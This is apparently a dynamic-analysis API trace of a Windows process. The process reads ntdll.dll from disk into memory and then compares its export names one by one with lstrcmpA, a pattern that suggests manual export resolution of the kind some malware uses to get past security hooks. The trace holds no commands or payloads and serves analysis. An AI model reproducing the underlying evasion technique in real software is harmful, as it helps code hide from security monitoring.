[0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0125.941] GetProcessHeap () returned 0x530000 [0125.941] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x4117040 | out: hHeap=0x530000) returned 1 [0125.948] GetProcessHeap () returned 0x530000 [0125.948] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x5492c0 [0125.948] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0125.948] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0125.948] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0125.948] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0125.948] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0125.948] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0125.949] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0125.949] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0125.949] GetProcessHeap () returned 0x530000 [0125.949] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1bba48) returned 0x4117040 [0125.953] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0125.953] ReadFile (in: hFile=0x140, lpBuffer=0x4117040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4117040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0126.223] CloseHandle (hObject=0x140) returned 1 [0126.223] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0126.223] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0126.223] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0126.223] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0126.223] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0126.223] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0126.223] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0126.223] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0126.223] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0126.223] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0126.223] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0126.223] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0126.224] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0126.224] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.224] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0126.224] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0126.224] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.224] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0126.225] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0126.225] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.225] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0126.225] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0126.225] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0126.225] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0126.225] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.225] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.225] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.225] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.225] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0126.225] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0126.225] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.225] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0126.226] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0126.226] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0126.226] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0126.227] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0126.227] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0126.227] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0126.228] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0126.229] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0126.229] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0126.229] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0126.229] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0126.229] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.229] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.229] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.229] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.229] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0126.229] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0126.229] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.229] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 